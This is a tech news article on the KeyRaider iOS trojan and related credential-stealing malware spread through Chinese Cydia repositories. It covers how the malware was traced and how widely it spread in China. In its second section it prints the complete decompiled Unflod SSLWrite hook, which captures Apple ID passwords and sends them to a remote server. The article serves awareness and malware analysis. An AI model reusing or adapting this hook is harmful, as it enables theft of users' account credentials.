(Source: AutoSiteCatalog)
Chinese third party app stores are presenting the same headache to Apple that they do Google

Late last week a group of Chinese iOS enthusiasts and Palo Alto Networks Inc. (PANW) shared an alarming revelation.  Over 225,000 jailbroken Apple, Inc. (AAPL) iPhones -- mostly in China -- have been infected via a new family of Trojans dubbed "KeyRaider".  And far from a hypothetical threat, the report went on to state that over 20,000 users appear to be actively exploiting credentials stolen by the malware to get "free" iTunes apps, books, videos, and music on the victims' design.

I. The Chinese Connection

For some this news may come as a surprise.  Once, the iPhone was a sales laggard in China, and hardly a high profile attack target in the region.  But that picture has shifted dramatically over the past few years.  The iPhone is big in China.  Wait, scratch big -- HUGE in China.  Since 2014, China has been driving Apple's growth largely via iPhone uptake, boosting the Cupertino company to massive profits even as some of its star products, like the iPad tablet, slid in sales.

It seems that Chinese buyers can't get enough of the iPhone, which has become a status symbol of sorts among China's increasingly affluent professional ranks.  But for all the financial upside, China is ultimately proving a double edged sword for Apple in terms of security.

China iPhone
The Chinese government in Beijing allegedly targeted Apple with cyberattacks this week. [Image Source: VR-Zone]

The world's largest smartphone market since 2011, China has a monthly active population of 370 million app users at last count.  But in the age of mobility, many in the world's biggest mobile market are falling back on their nation's old ways, seeking out free software by stripping away the security on their devices.

Apple's arch-rival Google, Inc. (GOOG) knows this story all too well.  Since surpassing Symbian in 2010-2012, Google's Android has been labeled by many journalists and security experts as not only the world's top mobile platform, but the least secure mobile platform, as well.  Indeed, while scattered stories of attacks on jailbroken iOS devices were occassionally reported as far back as 2009, experts agreed that the bulk of successful malware at the time was targeting Android.

Android malware
[Image Source: Android Authority]

But there was a caveat.  While Android's short-lived support for Adobe Systems, Inc.'s (ADBE) oft-vulnerable Flash rich media platform or "fragmentation" were oft blamed for attacks on Android, the reality was that in the U.S., Europe, Australia, Canada, and other developed markets, Android's malware affliction was largely nonexistent.  Most of the reports of mass infections of hundreds of thousands of infected Android users originated in China, and similar markets with abundances of jailbroken users and shady third party apps stores.  It could be said that Android's dominance in China to some extent gave it an undeservedly bad name in terms of security.

And now there's big trouble in-not-so-little China for Apple, as well.  

II. Malware Cometh

Since July, the researchers have been analyzing KeyRaider's behavior and digging into its code and distributon network hunting for clues of its origin.  What they found is both intriguing and alarming, a picture of cunning, malice, and betrayal in iOS's wild east.

The newly discovered "KeyRaider" family of iOS-specific malware may be the worst of its kind, but assuredly it isn't the worst of its kind.  In order to understand KeyRaider, it's perhaps best to begin with the store of Unflod and AppBuyer, highly similar malware examples.

Apple ID
There's been a rise in malware looking to steal your Apple ID over the past year and a half. [Image Source: iMore]

Unflod (aka SSLCreds or Unflod Baby Panda)was the first major credential theft malware to be discovered on iOS.  Apparently taking hold during the iPhone 5S's reign, Unflod was a fairly short code, which has less than 100 lines of instructions when decompiled.  It lurks in the "MobileSubstrate" collection of iOS dynamic libraries (*.dylib) on jailbroken iOS devices -- an approach that would later be used by AppBuyer and KeyRaider.

Unflod samples bore a signature that indicated that it was compiled in Feb. 2014.  Just two months after its apparent compilation it was discovered and discussed by reddit users, as well as later profiled by Germany's SektionEins GmbH.  As the Redditors and SektionEins state, Unflod appeared to originate in China and is believed to have been largely distributed by third-party iOS app stores, specifically certain app stores based on Cydia repositories.

Cydia app store
[Image Source: MayPalo]

The irony is not lost that redditor Jay "saurik" Freeman was among those to first discover this growing new class of Trojan malware threats.  Freeman is the owner of SaurikIT and developer of Cydia.  Initially launched in early 2008 for the original iPhone, Cydia was among the first underground iOS app stores, and ultimately it has proven the longest lived.  When it was found, Apple wasn't allowing third party apps.  But the launch of the iPhone 3G and third party apps with it, did not kill Cydia as some anticipated.

In the years since Cydia has morphed into a lucrative moneymaker, reselling developer paid content for jailbroken devices.  Saurik has alliances with many in the jailbreak community and Cydia is preinstalled, by default, as a part of many iOS jailbreaking programs.  A 2011 report by The Washington Post suggests that the nework fetches Freeman in excess of a quarter million dollars a year and that SaurikIT pulls in a cool $10M USD annually.  At the time Cydia had 4.5 million users weekly.

But it was Freeman's decision to share the wealth and freely license Cydia's framework under GPLv3 to others looking to start third party apps stores that has truly cemented its influence in the jailbreaking community.  

But since the discovery of Unflod saurik has seen third party adopters of the Cydia framework increasingly playing host to user content that transform the popular content platform into a malicious attack platform.

UnFlod was deceptively simple.  It overloaded Apple's SSL function, such that when the user attempted to authenticate using their Apple ID and password, the encryption failed.  Instead, the SSL imposter function -- UnFlod -- would send the user's data to remote command and control servers.

UnFlod's single function, "replace_SSLWrite" in its entirety:
int __fastcall replace_SSLWrite(int a1, char *a2, int a3, int a4)
  int v4; // r3@11
  int v5; // ST28_4@14
  size_t v6; // ST24_4@14
  int v7; // ST10_4@18
  size_t v8; // ST0C_4@18
  struct sockaddr v10; // [sp+40h] [bp-60h]@16
  ssize_t v11; // [sp+50h] [bp-50h]@14
  int v12; // [sp+54h] [bp-4Ch]@14
  struct sockaddr v13; // [sp+58h] [bp-48h]@12
  ssize_t v14; // [sp+68h] [bp-38h]@10
  int v15; // [sp+6Ch] [bp-34h]@10
  char *v16; // [sp+70h] [bp-30h]@7
  char *v17; // [sp+74h] [bp-2Ch]@5
  char *v18; // [sp+78h] [bp-28h]@5
  char *v19; // [sp+7Ch] [bp-24h]@2
  int v20; // [sp+80h] [bp-20h]@1
  int v21; // [sp+84h] [bp-1Ch]@1
  char *v22; // [sp+88h] [bp-18h]@1
  int v23; // [sp+8Ch] [bp-14h]@1
  int v24; // [sp+90h] [bp-10h]@11
  int v25; // [sp+94h] [bp-Ch]@1

  v25 = __stack_chk_guard;
  v23 = a1;
  v22 = a2;
  v21 = a3;
  v20 = a4;
  if ( !findhead )
    v19 = strstr(v22, "/WebObjects/MZFinance.woa/wa/authenticate HTTP/1.1");
    if ( v19 )
      findhead = 1;
      strcpy(content, v22);
  if ( findhead == 1 )
    v18 = strstr(v22, "<key>appleId</key>");
    v17 = strstr(v22, "<key>password</key>");
    if ( v18 )
      if ( v17 )
        strcat(content, v22);
        v16 = strstr(content, "</plist>");
        if ( v16 && v16 - content <= 2040 )
          v16[8] = 0;
        v14 = 0;
        v15 = socket(2, 1, 0);
        if ( v15 < 0 )
          v24 = pSSLWrite(v23, v22, v21, v20);
          goto LABEL_20;
        v13.sa_family = 2;
        *(_WORD *)&v13.sa_data[0] = 0xC61Eu;
        *(_DWORD *)&v13.sa_data[2] = inet_addr("");
        if ( connect(v15, &v13, 0x10u) < 0 )
          v24 = pSSLWrite(v23, v22, v21, v20);
          goto LABEL_20;
        v5 = v15;
        v6 = strlen(content);
        v14 = write(v5, content, v6);
        v11 = 0;
        v12 = socket(2, 1, 0);
        if ( v12 < 0 )
          v24 = pSSLWrite(v23, v22, v21, v20);
          goto LABEL_20;
        v10.sa_family = 2;
        *(_WORD *)&v10.sa_data[0] = 0xC61Eu;
        *(_DWORD *)&v10.sa_data[2] = inet_addr("");
        if ( connect(v12, &v10, 0x10u) < 0 )
          v24 = pSSLWrite(v23, v22, v21, v20);
          goto LABEL_20;
        v7 = v12;
        v8 = strlen(content);
        v11 = write(v7, content, v8);
        findhead = 2;
  v24 = pSSLWrite(v23, v22, v21, v20);
  if ( __stack_chk_guard != v25 )
    __stack_chk_fail(__stack_chk_guard, v24, v25, v4);
  return v24;

Evil as it may have been, UnFlod did bear a certain elegance in its brevity.  It is still unclear how many users were infected precisely or whether the stolen credentials were abused.  Given the timing one must wonder if the breach might have been tied to some of "the fappening" leaks of celebrity private photos/videos/content (which would corroborate Apple's claims that the leaks weren't the result of a separate breach affecting the iCloud and the "Find My iPhone" tool).  We may never know exactly what damage was done by UnFlod.

III. Apps Don't Grow on Trees

From an even broader perspective AppBuyer -- and KeyRaider -- belong to a growing collection of malware families that share a common goal: credentials theft.  

The security community is pushing back and loking to raise public awareness before its too late.  Over the past couple years Palo Alto Networks's Unit 42 has cultivated a fruitful set of partnership with amateur hackers/developers in China, including the iOS-centric WeipTech (Weiphone Tech Team).

Palo Alto Networks

PAN Unity 42

With the help of these local guns, Palo Alto Networks has crowdsourced the work of malware profiling and tracing.  This tactic has proved crucial in tracking the rise of credential stealing malware.  Among its prominent recent discoveries in this space include:
  • AppBuyer (aka "AdThief")
    • Discovered: May 2014 (preliminary) ; Sept. 2014 (official report)
    • Platform Targeted: iOS
    • Number Infected: 75,000+
    • Remote C&C (command & control) Capability?  Yes.
    • Kind: Trojan (malicious Cydia tweak)
    • Behavior: Steals iTunes credentials
  • Lurker (aka "WireLurker")
    • Discovered: Nov. 2014
    • Platform Targeted: iOS/OS X (incl. non-jailbroken devices)
    • Number Infected: 350,000+ (OS X stage; iOS stage: ??)
    • Remote C&C (command & control) Capability?  Yes.
    • Kind: Trojan that becomes a local worm
    • Behavior: Lurks in OS X waiting to infect connected iOS devices to steal user data
KeyRaider continues in the line of AppBuyer.  While more ambitious, it's also done a poorer job covering its tracks, if the discoverers' report proves accurate.

The malware first flew onto the radar in July when research sent complaints to amateur WeiTech research "i_82", a college student at Yangzhou University by day and white hat hacker by night.  The reports hit close to home.  WeiTech is affiliated with one of China's largest a most active iOS enthusiast communities, Weiphone.  And as it turns out, Weiphone's Cydia repositories have reportedly been unwittingly serving as KeyRaider's home base.

The KeyRaider saga appears to be a tale of betrayal, as at least prominent community member at Weiphone has been implicated in possibly being one of the malware's chief distributors.

The story is unique in the sense that unlike UnFlod and last year's AppBuyer/AdThief, this time around the security researchers have traced the malware in gory detail.  In fact the evidence is so damning that one might wonder if the apparent culprits were being framed by savvier hackers or foreign nation state hackers like the National Security Agency (NSA) or the U.S. Central Intelligence Agency (CIA) (both of which have been implicated in attack Apple users in the past).

But while history has taught us that Occam's razor does not always apply in today's era of strange espionage and deceit, sometimes the truth really is the most obvious one, so let us assume that the picture painted by Palo Alto Networks is reality incarnate.

Under that premise the story of KeyRaider begins with its behavior.  Like UnFlod, KeyRaider's core bits hide in the dynamic library "MobileSubstrate" directory tree of iOS.  The key clue to their existence is the malware's attempts to contact the attacker's command and control servers.

IV. Traitors in the Ranks?

Distribution-wise KeyRaider is a Trojan.  In some cases it is reportedly stored in ambiguous third-party packages, but more typically it appears to be bundled in counterfeited copies of well known apps or in so-called "Cydia Tweaks".  Cydia Tweaks are bundled customizations (scripts, etc.) for Cydia-enabled jailbroken devices.  Traditionally they've been a powerful tool for jailbreakers to make useful modifications to their iOS devices.

Cydia Tweaks

But given that so many jailbroken devices have exposed root access or other gaping holes, Tweaks are increasingly be viewed by hackers as a cheap ticket to serious device compromises.

Interestingly the exploit disables local and remote unlocking via hooking the apsd daemon in iOS and capturing the credentials used for push notifications, plus the GUID.  The mysterious motivations for this unusual strategy remain unknown at present.  It does, however, speak to the malware's sophistications, as the code is impacting previously undocumented internal iOS functionality pertaining to unlocking.

The Trojan's other tactics appear more straight forward.

The malware is continuously active scanning the system memory for signs of an authentication attempts -- specifically instances of "itunesstored", the process Apple uses for internal authentication messaging to the App Store.  

iTunes Store hook

The Hook (click to enlarge) [Image Source: PAN/WeiTech]

When it witnesses an attempt, the App Store purchasing information is intercepted and logged by the-man-in-the-middle, a fake SSLWrite.  Presumably the snooper than completes the authentication attempt to maintain its guise of innocent operation.


The Catch [Image Source: PAN/WeiTech]

Upon the call to SSLRead, the program extracts (and clears) the logged cache value which contains the Apple account username, password, and in some cases, the device GUID.  It encrypts this info with a fixed AES key (which would prove a key clue to the malware's apparent origin).


Bringing Home the Bounty [Image Source: PAN/WeiTech]

The malicious code maintains active command and control links to both ferry its encrypted stolen contents to the attackers, and reportedly to allow for modifications in the future that could make it dangerous.  In fact, some users reported receiving threats tied to KeyRaider (one even sent a picture which is posted on Palo Alto Networks' blog, which may indicate it's upgraded itself to include ransomware capabilities or is perhaps pulling partner malware packages into the fray.  Alternatively this connection may prove coincidental.  But it's certainly an option on KeyRaider's radar.

Ultimately it is the encrypted traffic where the onion of a mystery began to peel back under WeiTech and Unit 42's probing.  It was apparent the malware was transmitting to a specific IP -- which importantly remained active.  WeiTech conducted a bit of a counterattack, using SQL injection to hack the hackers, the dumping their database of stolen credentials.  The primary table "aid" contained 225,941 total entries.  The contents were able to be confirmed by a portion of the entries that were not encrypted.

Hack Back [Image Source: PAN/WeiTech]

While the Palo Alto Networks blog does not mention it, I believe this may be tied to the use of the stolen credentials in the client apps that utilize the stolen credentials.  These apps have been downloaded approximately 20,000, the researchers note.  Perhaps the authors decrypted the credentials for use by their end users out of laziness, not wanting to have to handle encryption on both ends.

The big breakthrough, though, came when i_82 cracked the AES encryption by decompiling the source code of one of the attack apps.  The key code was "mischa07"...


[Image Source: PAN/WeiTech]

... and lo and behold a user matching that name was not only on WeiPhone, but had 15 Tweaks and apps containing the code in their repository.  Further indicating their role as the mastermind, the same user is promoting a pair of client apps iappstore and iappinbuy, which tap the user credentials.



[Image Source: PAN/WeiTech]

Ironically, the damage appears to have been limited by user skepticism that these apps would work.  The iappstore app obtains a stolen credential which is stored locally and uses it to pay for paid app purchases.  It was only downloaded 62 times, reportedly.  The second app, iappinbuy, used the stolen credentials to purchase in-app items.  That app was downloaded nearly 20,200 times and appears to be where most of KeyRaider's damage has been done.

iTunes -- China
WeiPhone users largely were suspicious of the client apps being pranks and didn't take advantage of the them, limiting the damage. The client apps allowed users to download items from China's iTunes portal (pictured) on the victim's dime. [Image Source: M.I.C. Gadget]

Bamu's role appears to have been found by analyzing messages which in addition to the stolen credentials upload a flag.  In the case of mischa07's Trojans, the value is the name of the app.  By contrast, other uploads carried the name "bamu", hinting at some sort of kickback arrangement.  Bamu's apps appear to have stolen about two-thirds of the credentials lifted via the mass infection.

While there's a faint possibility that their support was somehow unwitting and accidental, it appears that "bamu", a top Weiphone community contributor, may have helped to balloon the breach. While the user has a reputation for providing tools to the community, they may have parlayed that trust into a harsh betrayal of their fellow Weiphoners.  In total 77 Tweaks and apps appear in bamu's repository contain the dark passenger.  Among the popular app titles that bamu allegedly tainted with KeyRaider include iFile, iCleanPro, and avfun.

V. Some International Exposure is Observed

In terms of impact, in addition to the 225,941 stolen app store credentials, the researchers found in total 5,841 entries of private key and certificate for push notifications.  It's possible the smaller quantity is due to this feature only recently being added.  There was also a list of 3,000 iTunes receipts likely stored for analysis purposes after successful calls from the client apps.

Additionally a total of 92 KeyRaider variants -- Trojans containing the core malicious payload -- were found in the wild.

In addition to the client apps not taking off, another lucky turn is that the malicious apps don't appear particularly hard to remove from jailbroken iPhones.  Basically the key is to just delete the malicious dynamic libraries.  Of course, if you find the signature on your device, you'll assuredly want to change your Apple ID password and activate two-factor authentication as well.

As with past attacks the vast majority of the victims are isolated to the home ground of the associated third-party app store (namely, China).  Unit 42 writes that "over half" of the email addresses in the database were from Tencent subscribers.  Among the other top 10 email domains, most were Chinese...
... while a couple were associated with America's top tech firms:
  • (Apple)
  • (Apple)
Additionally other emails indicated users from other countries may have been exposed.  These include:
  • tw: Taiwan
  • fr: France
  • ru: Russia
  • jp: Japan
  • uk: United Kingdom
  • ca: Canada
  • de: Germany
  • au: Australia
  • us: United States
  • cz: Czech Republic
  • il: Israel
  • it: Italy
  • nl: Netherlands
  • es: Spain
  • vn: Vietnam
  • pl: Poland
  • sg: Singapore
  • kr: South Korea
The list showcases the damaging domino effect that China's lax security can have.  Many of these regions such as Canada, Australia, the United Kingdom, Germany, France, and Italy traditionally have seen extremely few mobile attacks.

In China WeiTech has posted the information in an advisory with Wooyun, a crowdsourced threat advisory platform.  They also posted on the malware on their Weibo account.  Palo Alto Networks and WeiTech have also passed along the warning to CNCERT/CC, China's governmental threat tracking body.

VI. Rude Awakening

In case the hack of its developer hub two years back wasn't sign enough, the recent spate of attacks should be a wakeup call to Apple.  With the likes of KeyRaider, AppBuyer, and WireLurker on the prowl infecting five figure or near-five figure user popuations in the wild for iOS should be a wakeup sign of sorts for Apple.  Even the Chinese government is recognizing that iOS can be every bit as much a security risk as Android, when abused.

For years Apple has devoted most of its energy into fighting jailbreaking which it has repeatedly insisted is inherently "illegal".  Granted, if it were possible to stop, these kinds of mass outbreaks might be made practically extinct.  But Apple would be wise to face the writing on the wall: the battle against the jailbreakers has been fought and lost.

It's no secret that Apple's security has long been lacking in some regards on iOS.  Many glaring security flaws in iOS were reported over the years.  One blunt analysis concluded that Apple was ten years behind Microsoft Corp. (MSFT) in terms of security.  It has only been due to a mix of good fortune and lack of commercial payoff due to the smaller userbase size, Apple has largely avoided any sort of effective attacks against its iOS customers.

There is growing concern related to the US government's digital efforts to compromise encryption
[Image Source: Gizmodo]

The same could be said for some time about OS X, but that situation was the first to shift.   Today OS X Trojans have been a relatively common occurence -- including in the U.S.  In the face of pathological denial on Apple's part hundreds of thousands of Macs have been infected at times.  That has ultimately forced to Apple to admit OS X has some security concerns.  While it has stopped short of offering them free protection, even Apple now warns OS X users to use antivirus software.

Apple's need to better secure iOS is pressing, as it is deeply dependent on China, and can not afford to overlook the security impact that growing unruly userbase may have on the broader global iOS customer base.  

Aside from the American market, China is Apple's most crucial foreign market.  In the quarter ending in June, it accounted for $13B USD sales most of which come from iPhone sales and sales of iPhone related content.  Even in its slowest quarter, Apple managed to sell approximately 12.5 million iPhones in the region [source].  (Which is why China's recent currency woes have hit oh so hard.)

Apple has also prided itself as a content curator -- the master of its walled garden.  Thus many may believe that with so many iPhone users in China -- the land of software piracy and honey (but most the former) -- Apple has at long last become the first to slay the Chinese piracy dragon.

Well, not so much.

VII. iOS Jailbreaks Remain Abundant, Dangerous in China

It turns out that the same dirty little problem that's plaguing third party Android app stores -- piracy-friendly third party app stores -- is also bugging Apple, as well.  To give credit where credit is due (depending on your perspective on DRM), there are a bit less jailbroken iOS devices in China versus rooted Android, their equivalent.  This could be due to any number of factors, but like is tied somewhat to Apple's higher ASP (average sales price), which likely attracts a more affluent crowd capable of paying for content.

That's not to say that all jailbreakers and rooters are scurvy pirates.  Some remove device restrictions for customizability or research.  Even among the pirate crowd such secondary motivations are more common in China than in many regions, in part because many foreign devices and iOS lack access to certain local app markets and aren't as well regionalized as people would like.  

iOS 9
Many Chinese users feel that the default iOS localized keyboard in iOS is inferior compared to the Pinyin fast-type keyboard from Chinese software giant Baidu Inc. (ETR:B1C).

M.I.C. Gadget, a Chinese tech blog, highlights some of the issues with iOS 9 to this end writing:

There are two main reasons for Chinese people desperately need jailbreaking for their iPhone and iPad. First, the laggy Apple’s App Store. The connection in China is stupidly slow, properly there’re no dedicated server to China. It could take more than 10 minutes to get a simple app like FlipBoard or Facebook to be downloaded. For those apps with size over 100 MB are really a painful experience. If you want to subscribe some magazine on Newstand, it takes ages to download one issue. Local third-party iOS App Store such as PP Assistant and 91 Assistant consequently become the best option for Chinese iOS users, which is fast and convenient, and of course you need to jailbreak your iOS devices first in order to use it.

Next, we come to the Chinese input method. iOS’s default input method for Chinese is rather difficult to use. The size of the screen has limited the speed of typing Chinese characters using QWERTY keyboard. The new iPhone 5 does not provide a bigger screen with a wider width, it just become longer which doesn’t improve the convenient of Chinese input. Switching between Chinese and English is user un-friendly, the number of Chinese vocabulary is also very limited. Jailbreaking the iOS device can allow Chinese user to install their familiar input softwares which are made by Chinese internet companies. Those localized Pinyin Input can let user type at least 2 times faster, thanks to the more accurate of predictive phrases. And not forget about the old-school T9 input method which was applied to mobile phone in the early, it’s still widely used by many Chinese phone user. The rapid and efficient of T9 keyboard is very good to input Chinese Pinyin.

Of course, that's not meant as a knock against Apple, alone.  

Chinese customers have similar complaints about many of the non-local Android smartphone makers.  In fact, while iTunes may not work well in China, as of last year Google Play officially wasn't supported at all in China (although many were still able to access it via spoofing their location codes).  And thus, for a mixture of pirate urges and practicality, many in China choose to remove the restrictions on their device -- with or without permission from the devicemaker.

Android jailbreak rates aren't as high as some might guess.  According to an Aug. 2014 survey by Chinese telecom Tencent Holdings Ltd. (HKG:0700), 27.44 percent of Chinese Android smartphone users root their phones (roughly 1 in 4).  At one time Apple jailbreak rates in China were even higher -- as high as 35 percent (1 in 3 users).  In 2013 as sales picked up, those rates fell sharply to around 12 percent.  But they've been creeping up very slow ever since, hitting 13.6 percent in Sept. 2014 [source] -- roughly 1 in 8 customers.

Chinese customers proclivity for rooting Androids and using them with unsecured third-party app stores helped make Android the most malware-ridden platform in 2013, according to Finnish security firm F-Secure.

Interestingly Chinese are far from the most attacked country when it comes to non-mobile threats.  According to a report by Kapersky, while over 50 percent of attacks appeared originate from China...

China malware

...China wasn't even in the top ten in receiving non-mobile attacks.  It ranked 16th:

  Country* % unique users attacked**
1 Russia 38.98%
2 Kazakhstan 37.70%
3 Ukraine 35.75%
4 Syria 34.36%
5 Belarus 33.02%
6 Azerbaijan 32.16%
7 Thailand 31.56%
8 Georgia 31.44%
9 Moldova 31.09%
10 Vietnam 30.83%
11 Armenia 30.19%
12 Kyrgyzstan 29.32%
13 Croatia 29.16%
14 Algeria 28.85%
15 Qatar 28.47%
16 China 27.70%
17 Mongolia 27.27%
18 Makedonia 26.67%
19 Bosnia and Herzegovina 25.86%
20 Greece 25.78%
But when it comes to mobile threats China is the world's most dangerous place to be a smartphone user:

  Country* % of users attacked**
1 China 16.34%
2 Malaysia 12.65%
3 Nigeria 11.48%
4 Bangladesh 10.89%
5 Tanzania 9.66%
6 Algeria 9.33%
7 Uzbekistan 8.56%
8 Russia 8.51%
9 Ukraine 8.39%
10 Belarus 8.05%
Part of this, of course, is because China is also the world's biggest smartphone market.  But it also owes a lot to the fact that approximate 1 in 4 Android smartphone owners and 1 in 8 iPhone owners has rooted their device.

In both malware threats...

Kapersky -- mobile malware

... the red dragon is cherry red on Kapersky's charts, indicating the highest percentage of users experiencing these kinds of attacks.  And while it's largely avoided the particularly insidious "banking malware" subcategory of mobile malware...

Kapersky -- banking mobile malware

...China is seeing a growing number of threats in that space as well, as well.

And increasingly the Chinese customer is being targeted by maturing families of malware.  In Q1 2015, for example, roughly three in every five mobile malware packages was new. In Q2, interestingly, while new mobile malware packages soared nearly 3-fold over Q1, the percentage of new packages versus existing ones dipped sharply to just under 20 percent.  This indicates that four in five malware packages seen in Q2 were already known in prior quarters.

Mobile malware packages

And it's not just malware (which typically seeks privilege escalation and device takeover).  There's many related malicious software categories (scareware, ransomware, adware, etc.) that are also in the rise in the mobile space.

mobile malware
Mobile malware by Category -- Q2 2015 -- Kapersky Labs

It is clear that after years of blowing off mobile malware as an "Android issue", China, app piracy, and the correlated abundance of mobile malware are now industry-wide issues.

China and Apple may eventually see their relationship wane under the pressure of new stresses.
[Image Source: CNN]

Traditionally Apple has taken a fearful, adverserial stance towards even the most pro-Apple of hackers searching for threats on its platform.  There are annecdotal signs that's changing, such as jailbreaker Comex's internship stint.  While that liason admittedly ended in bizarre fashion with Apple firing him for not replying to an email, the fact that he was brought in in the first place, suggests Apple is acknowledging the need for cooperation with the hacker community.

VIII. It Could be Worse

Such change is likely to be chaotic, but is inevitable.  The world of security is complex and no longer fits into Apple's former black and white views towards security researchers.  Further evidence of this is observed in other prominent recent hires, including top former Windows hacker Kristin Paget (formerly Chris Paget).

In terms of results, Apple still faces less attacks by the numbers and is doing a better job at wiping its customers devices than some Android OEMs.  It's also shored up its encryption, in the past few iOS releases.

It's a hard knock life for Apple as it finds itself the target of a multitude of hacking interests ranging from the U.S. and Chinese governments to the plethora of citizen hackers in China, Russia, and Eastern Europe.  

CoolPad installs backdoors on its user devices?  Cheer up Apple fans, it could be worse...
[Image Source: Google Images]

But Apple users can at least be thankful their favorite OEM isn't purposefully sabotaging users devices like the "CoolReaper" backdoor that the Coolpad Group Ltd. (HKG:2369) -- China's third largest smartphone maker and the world's sixth place global phonemaker, overall -- was caught using.  Apparently it truly could get worst.

Source: Palo Alto Networks [blog]

"I mean, if you wanna break down someone's door, why don't you start with AT&T, for God sakes? They make your amazing phone unusable as a phone!" -- Jon Stewart on Apple and the iPhone

Most Popular Articles

Copyright 2018 DailyTech LLC. - RSS Feed | Advertise | About Us | Ethics | FAQ | Terms, Conditions & Privacy Information | Kristopher Kubicki